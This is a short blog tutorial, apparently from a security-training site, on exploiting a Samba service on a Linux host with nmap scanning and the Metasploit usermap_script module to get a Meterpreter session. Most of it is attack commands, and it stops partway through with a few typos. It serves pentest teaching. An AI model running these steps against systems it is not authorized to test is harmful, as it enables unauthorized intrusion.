Hacking and gaining access to Linux by exploiting SAMBA service

V.P. Prabhakaran
February 4, 2018 by
V.P. Prabhakaran

Step 1

First, we need to find out the ports and services running on the target system. To find the open ports and services, the command is:

Command: nmap -sS -Pn -A

Earn two pentesting certifications at once!

Earn two pentesting certifications at once!

Enroll in one boot camp to earn both your Certified Ethical Hacker (CEH) and CompTIA PenTest+ certifications — backed with an Exam Pass Guarantee.

Step 2

Once you find the open ports and service like the samba port and service ready, get set for sending an exploit through that port to create a meterpreter session. To perform this attack, you need to open metasploit.

Step 3

Once you open metasploit, first we need to find the version of samba

Command: -msf> search scanner/samba

(This command used to finding the scanner parameter to find samba version)

Step 4

Once you find the scanners to find the samba version of the target, use the scanner parameter.

Command: msf> use auxiliary/scanner/smb/smb_version

(This command is used to set the scanner parameter)

Command 2: msfauxiliary(smb_version) > set RHOSTS

(This command is used to set the IPaddress of the remote host of which you need to find the version)

Command 3: exploit

Step 5

After finding the samba version, perform an attack and gain access to the linux system with the help of the Meterpertersession

Command: msf> use exploit/multi/samba/usermap_script

This is the exploit that we need to select to gain access to system

Command: msf exploit(usermap_script) > set RHOST


What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

V.P. Prabhakaran
V.P. Prabhakaran

V.P. Prabhakaran is a highly-experienced security pro, having more then 7 years experience as Senior Information Security Consultant at Koenig Solutions. Mr. Prabhakaran trains and provides consultancy to professionals for Computer Hacking, Forensic Security and Firewalls. He is certified in CEH, ECSA, ECSS, CHFI, EDRP ECIH, CEI, OSSTMM (OPST and OPSA) ISECOM Trainer MCT and CEI.